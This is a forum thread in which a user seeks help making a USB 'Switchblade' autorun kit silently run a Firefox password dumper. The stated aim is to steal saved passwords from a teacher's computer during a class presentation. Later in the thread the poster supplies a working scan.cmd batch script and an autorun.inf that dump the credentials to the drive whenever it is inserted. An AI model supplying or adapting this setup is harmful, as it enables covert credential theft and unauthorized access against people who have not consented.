Firepassword.exe on Switchblade

kz26

I have a Sandisk U3 drive as described in my sig with the Switchblade hack and DLSS v2 loaded. Everything works fine EXCEPT for the firepassword.exe Firefox password dumper. It will work fine when I run it directly, but when using the start.cmd Autorun script it doesn't even seem to generate any output at all. Anyone got an idea of what might be wrong and how to fix it?

This is really urgent because I will be giving a presentation (with "added bonuses") on my English teacher's computer next week!

I have a Sandisk U3 drive as described in my sig with the Switchblade hack and DLSS v2 loaded. Everything works fine EXCEPT for the firepassword.exe Firefox password dumper. It will work fine when I run it directly, but when using the start.cmd Autorun script it doesn't even seem to generate any output at all. Anyone got an idea of what might be wrong and how to fix it?

This is really urgent because I will be giving a presentation (with "added bonuses") on my English teacher's computer next week!

correct , i've noticed that aswell and have no clue why it does that sorry ...

I think this would be a mistake... however saying that... You shouldn't have to worry about that. I don't know any schools that force the use firefox, and even less people who use it over IE.

Actually our school is mostly IE...but this teacher just happens to use Firefox...

Mmmm...nice, juicy password file. I guess I'll just have to run it manually??

Yes...I figured out a fully automatic solution.

Step 1:

Open the scan.cmd file in the root of the drive.

Make it say:

@echo off

if not exist switchbladedump%computername% md switchbladedump%computername%

switchbladetoolsfirepassword >switchbladedump%computername%ffx-dump.txt

nircmd.exe execmd CALL switchbladetoolsstart.bat

exit

Then change autorun.inf to:

[autorun] 

action=Open Files On Folder

icon=switchbladeiconsdrive.ico

shellexecute=scan.cmd

Seems like NirCmd is causing the problem. After this modification, the Firefox pass dumper will be run from a native windows shell. However this also means that a small black command window will pop up for about a half second. But I figured out my problem, and hopefully others can put this to good use.